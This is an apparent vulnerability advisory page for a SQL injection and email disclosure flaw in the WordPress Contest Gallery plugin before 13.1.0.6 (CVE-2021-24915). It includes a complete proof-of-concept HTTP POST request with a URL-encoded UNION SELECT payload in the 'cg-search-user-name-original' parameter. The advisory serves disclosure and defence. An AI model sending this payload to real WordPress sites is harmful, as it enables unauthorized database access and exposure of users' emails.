Lucene search
Tyler MillerWPEX-ID:45EE86A7-1497-4C81-98B8-9A8E5B3D4FACHistoryNov 01, 2021 - 12:00 a.m.
Contest Gallery < 13.1.0.6 - Missing Access Controls to Unauthenticated SQL injection / Email Address Disclosure
2021-11-0100:00:00
Tyler Miller
313
0.397 Low
EPSS
Percentile
97.3%
The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
Connection: close
Upgrade-Insecure-Requests: 1
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
Related
cvelist
cvelist
cve
cve
CVE-2021-24915
2021-11-29 09:15:07
cnvd
cnvd
WordPress Contest Gallery SQL Injection Vulnerability
2021-12-01 00:00:00
nuclei
nuclei
Contest Gallery < 13.1.0.6 - SQL injection
2023-10-17 07:20:28
nvd
nvd
CVE-2021-24915
2021-11-29 09:15:07
wpvulndb
wpvulndb
prion
prion
Sql injection
2021-11-29 09:15:00